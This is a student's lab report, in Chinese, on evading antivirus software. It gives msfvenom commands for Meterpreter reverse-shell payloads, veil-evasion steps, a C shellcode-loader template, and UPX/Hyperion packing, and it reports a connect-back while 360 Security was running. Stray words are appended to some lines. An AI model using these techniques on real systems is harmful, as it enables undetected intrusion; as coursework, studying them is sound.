2018-2019-2 網絡對抗技術 20165219 Exp3 免殺原理與實踐

2018-2019-2 網絡對抗技術 20165219 Exp3 免殺原理與實踐

實驗任務

1 正確使用msf編碼器,msfvenom生成如jar之類的其餘文件,veil-evasion,本身利用shellcode編程等免殺工具或技巧;(1.5分)php

2 經過組合應用各類技術實現惡意代碼免殺(1分)
(若是成功實現了免殺的,簡單語言描述原理,不要截圖。與殺軟共生的結果驗證要截圖。)java

3 用另外一電腦實測,在殺軟開啓的狀況下,可運行並回連成功,註明電腦的殺軟名稱與版本(1分)shell

基礎問題回答

(1)殺軟是如何檢測出惡意代碼的?編程

分析特徵碼,惡意代碼都含有的一段代碼,簡稱特徵碼,只要包含這段代碼就被認定是惡意代碼;windows

檢測該代碼執行時是否有異常的行爲,好比打開異常端口、關閉防火牆等。數組

(2)免殺是作什麼?
經過一些手段對惡意代碼進行假裝,不被殺毒軟件檢測出。安全

(3)免殺的基本方法有哪些?網絡

改變特徵碼,改變行爲,利用現有playload手工打造一個後門程序。tcp

實驗過程

正確使用msf編碼器,msfvenom生成如jar之類的其餘文件,veil-evasion,加殼工具,本身利用shellcode編程等免殺工具或技巧
使用msf編碼器msfvenom生成後門程序

實驗二中生成的後門程序,在virscan網站中掃描
工具

經過圖片能夠看到,不加處理的惡意代碼能被絕大多數殺毒軟件識別。

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=攻擊機的IP LPORT=端口號 -f exe > xxx.exe

進行10次編碼試試下降檢出率

在virscan網站中掃描

雖然進行屢次編碼,但特徵碼仍存在,所以依舊能被絕大多數殺毒軟件檢測出來。

msfvenom生成php文件
msfvenom -p php/meterpreter/reverse_tcp LHOST=攻擊機的IP LPORT=端口號 x> xxx.php

在virscan網站中掃描

msfvenom生成jar文件
msfvenom -p java/meterpreter/reverse_tcp LHOST=攻擊機的IP LPORT=端口號 x> xxx.jar

在virscan網站中掃描

使用veil-evasion生成後門程序及檢測

安裝veil成功以後,輸入veil,再用use evasion命令

輸入命令use c/meterpreter/rev_tcp.py進入配置界面

設置反彈鏈接IP:set LHOST 此處IP爲Kali IP

設置端口:set LPORT 5219

輸入generate生成文件,而後輸入playload的名字

在目錄 /usr/share/veil-output/compiled裏找到咱們生成的文件,在virscan網站中掃描

利用shellcode編程
msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻擊機ip LPORT=端口號 -f c

生成一段c語言格式的shellcode數組

編輯一個.c文件

unsigned char buf[] = 

int main()
{
    int (*func)() = (int(*)())buf;
    func();
}

i686-w64-mingw32-g++ 20165219.c -o 20165219.exe
編譯後變成可執行文件

進行檢測

windows上用殺軟檢測

加壓縮殼

對上面的shellcode加殼

檢測

使用加密殼Hyperion

將wyb_upxed.exe拷貝到/usr/share/windows-binaries/hyperion/

端輸入命令wine hyperion.exe -v wyb_upxed.exe wyb_upxed_Hyperion.exe

經過組合應用各類技術實現惡意代碼免殺

對半手工製做shellcode加壓縮殼不能達到免殺的目的,加密殼有必定的概率是能夠達到了免殺的目的。

加密殼的免殺和反彈鏈接

用另外一電腦實測,在殺軟開啓的狀況下,可運行並回連成功,註明電腦的殺軟名稱與版本

對方電腦的殺毒軟件爲:360安全衛士 版本11

免殺的截圖

回連成功的結果圖

實驗過程當中遇到的問題

沒有成功安裝veil

解決辦法:拷了別的同窗安裝好veil的虛擬機

離實戰還缺些什麼技術或步驟?

免殺技術單一,跟不上病毒庫的更新,之後應該嘗試多種技術的組合

實踐總結與體會

學習完本次的實驗對免殺原理有了深層次的瞭解,爲之後防範惡意軟件攻擊打下了基礎。

相關文章
相關標籤/搜索